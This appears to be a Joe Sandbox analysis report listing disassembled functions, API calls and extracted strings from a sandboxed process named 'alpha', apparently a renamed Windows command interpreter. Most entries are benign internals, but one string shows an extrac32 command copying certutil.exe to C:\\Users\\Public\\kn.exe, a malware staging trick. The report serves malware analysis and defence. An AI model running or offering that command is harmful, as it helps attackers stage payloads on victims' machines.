Part of subcall function 00007FF7823E8198: wcscmp.MSVCRT ref: 00007FF7823E81EA
Part of subcall function 00007FF7823E8198: wcscmp.MSVCRT ref: 00007FF7823E81FD

Strings

%s, xrefs: 00007FF7823EFC14

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$wcscmp
String ID: %s
API String ID: 243296809-3043279178
Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
Instruction ID: 71f00e4c989cc4497e46a980e7c2563a2dd49fdf61637108dc7ddce8216551b6
Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
Instruction Fuzzy Hash: 6AA1C7267097C6A6EB71EB21D8613F9A390FB4474AFA04079CA4D47E94DF7CE649C310

Function 00007FF7823D1F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D2058

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

memset.MSVCRT ref: 00007FF7823D20C1
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D20D2
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D2117
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D21DC

Strings

DIRCMD, xrefs: 00007FF7823D20C9, 00007FF7823D2109

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$EnvironmentVariable
String ID: DIRCMD
API String ID: 1405722092-1465291664
Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
Instruction ID: 7e02b81fbccff886aae52d0871d9d094b24f4f676bc82bffae2e9075cf9bc5cf
Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
Instruction Fuzzy Hash: 1B819F72A08BC28AEB20DF20E8942EDB7A4FB48349F604179DA8D67F59DF78D145C710

Function 00007FF7823D99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

wcschr.MSVCRT(?,?,?,00007FF7823D99DD), ref: 00007FF7823D9A39

Part of subcall function 00007FF7823DDF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7823DCEAA), ref: 00007FF7823DDFB8
Part of subcall function 00007FF7823DDF60: RtlFreeHeap.NTDLL ref: 00007FF7823DDFCC
Part of subcall function 00007FF7823DDF60: _setjmp.MSVCRT ref: 00007FF7823DE03E

wcschr.MSVCRT(?,?,?,00007FF7823D99DD), ref: 00007FF7823D9AF0
wcschr.MSVCRT(?,?,?,00007FF7823D99DD), ref: 00007FF7823D9B0F

Part of subcall function 00007FF7823D96E8: memset.MSVCRT ref: 00007FF7823D97B2
Part of subcall function 00007FF7823D96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D9880

_wcsupr.MSVCRT ref: 00007FF7823EB844
wcscmp.MSVCRT ref: 00007FF7823EB86D

Strings

FOR, xrefs: 00007FF7823EB863
IF, xrefs: 00007FF7823EB850

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
String ID: FOR$ IF
API String ID: 3663254013-2924197646
Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
Instruction ID: fb476b6ce8f89dab6913a4f0f703f0f71d813acf1cc4a096f1fa0315742a89a8
Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
Instruction Fuzzy Hash: E551F265F08642A1FE15BB15D424279A792FF44B92FE44278D92E07FD1DFBCA805C320

Function 00007FF7823DF173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6
iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1BA
wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF1E7
iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1FF
iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF2BB

Strings

), xrefs: 00007FF7823DF18C
=,;, xrefs: 00007FF7823DF1CE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswdigit$iswspacewcschr
String ID: )$=,;
API String ID: 1959970872-2167043656
Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
Instruction ID: 69e7651ec7eb006a2c7aea50e5838aa7946d2a3d36231de1ebefab8b7a9df02a
Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
Instruction Fuzzy Hash: BA41A165E1825286FBA47B11A5A8379F6A0BF10757FE45079C94D039E4DFBCA881C730

Function 00007FF7823FBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

iswalpha.MSVCRT ref: 00007FF7823FBABA
towupper.MSVCRT ref: 00007FF7823FBAD1
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FBB13
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FBB2F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FBB48

Strings

%04X-%04X, xrefs: 00007FF7823FBBBB
:, xrefs: 00007FF7823FBAAF

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorLast$InformationVolumeiswalphatowupper
String ID: %04X-%04X$:
API String ID: 930873262-1938371929
Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
Instruction ID: 2303f4992886d11886ea6a26a4257a101506efc8bf72a7447567b18b93d00060
Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
Instruction Fuzzy Hash: 7441B371A08A82D2EB60AB61F4102BAE761FB88742FE04179D94D43AD5DFBCD845C730

Function 00007FF7823E36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E3715
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EE96E
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823EE9A7
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EE9D5

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF7823E3703

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
API String ID: 3249344982-2616576482
Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
Instruction ID: 9b72dc1d955a60a0e0c3a1a2d63989fedc06ce544d4a795283208a3746420ec7
Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
Instruction Fuzzy Hash: EE415072A18A4186E3109B12E85437ABBE4FB59F96F944278DA4D07B94CF7CD458CB20

Function 00007FF7823E6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6A73
wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6A91
wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6AB0
wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6AE3
wcschr.MSVCRT(?,?,00000000,00007FF7823E68A3,?,?,?,?,?,?,?,00000000,?,00007FF7823E63F3), ref: 00007FF7823E6B01

Strings

+-~!, xrefs: 00007FF7823E6AA9, 00007FF7823E6ADC
<>+-*/%()|^&=,, xrefs: 00007FF7823E6A8A, 00007FF7823E6AF7

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
Instruction ID: 09cba5dfbbd093645a12fcc8b18b573db16ea5261bd3efd23827da38a9715878
Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
Instruction Fuzzy Hash: A5317236A08B56D5EB50AF02E460278BBE0FB45F46BA5C079DA4E43B54EF7CE548C720

Function 00007FF7823FD878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FD899
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD8A8
_get_osfhandle.MSVCRT ref: 00007FF7823FD8D7
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD8F1
_get_osfhandle.MSVCRT ref: 00007FF7823FD8FF
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD921
_get_osfhandle.MSVCRT ref: 00007FF7823FD969
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD983

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$Pointer$BuffersFlushRead
String ID:
API String ID: 3192234081-0
Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
Instruction ID: 3f69d666e889f2eea9266a7a16e635a59012bb12573fbd58c628e578d99e88f1
Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
Instruction Fuzzy Hash: 3231A032A086418BE750AF22B41867DFFA0FB89B82F909538DE4A43B95CE7CD445CB10

Function 00007FF7823E1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E1673
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E168D
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E1757
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E176E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E1788
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7823E14D6,?,?,?,00007FF7823DAA22,?,?,?,00007FF7823D847E), ref: 00007FF7823E179C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Process$Alloc$Size
String ID:
API String ID: 3586862581-0
Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
Instruction ID: ac99a33021fb533fbda6be3bb7c26d02231b28a8f843463e950908692cac548c
Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
Instruction Fuzzy Hash: 0891A569A0974691EA51AB15D460379F7A0FB44B82FB58179CE5D03F90DFBCE849C320

Function 00007FF7823E86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E88C0: NtOpenThreadToken.NTDLL ref: 00007FF7823E88E7
Part of subcall function 00007FF7823E88C0: NtOpenProcessToken.NTDLL ref: 00007FF7823E8907
Part of subcall function 00007FF7823E88C0: NtClose.NTDLL ref: 00007FF7823E896C

SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823E87D7
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7823E8807
RtlNtStatusToDosError.NTDLL ref: 00007FF7823F517E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F518C
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823F51FD
wcsstr.MSVCRT ref: 00007FF7823F5219
wcsstr.MSVCRT ref: 00007FF7823F5236

Part of subcall function 00007FF7823E885C: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E88A2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
String ID:
API String ID: 1313749407-0
Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
Instruction ID: 9db53f18be1a6affb14ff2734766408a2cb58f2f52b67e08d94ea35931275bc0
Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
Instruction Fuzzy Hash: 9B51C825E0978262FE507B11E424279E691BF45B92FE84178CD6E17FE1DFBCE845C220

Function 00007FF7823FEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FEC73

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FEE0A

Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E

SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FECD5
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FECED
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FED9C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FEDAC
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FEDC8

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
String ID:
API String ID: 920682188-0
Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
Instruction ID: 11a0c52085214138767965d33ade0165a1f6357f4a5a1d48b5db00d3ef3865c2
Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
Instruction Fuzzy Hash: C5519E36705BC18AEB25EF21E8542E8B7A0FB88B45F948079CA4D47B54EF7CD545C720

Function 00007FF7823DDF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7823DCEAA), ref: 00007FF7823DDFB8
RtlFreeHeap.NTDLL ref: 00007FF7823DDFCC
_setjmp.MSVCRT ref: 00007FF7823DE03E

Strings

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7823DE00B

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$FreeProcess_setjmp
String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 777023205-3344945345
Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
Instruction ID: 2a4768cdfede8242a8afe36b571afeccb25f500a55c4a3be4951ff18a7757101
Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
Instruction Fuzzy Hash: 48515A71E1DA4285FA50AB12A8541B8FBA0FF48792FF44479D94D43BA5DFBCA840C731

Function 00007FF7823DF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1BA
wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF1E7
iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF1FF
iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF2BB

Strings

), xrefs: 00007FF7823DF18C
=,;, xrefs: 00007FF7823DF1CE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswdigit$iswspacewcschr
String ID: )$=,;
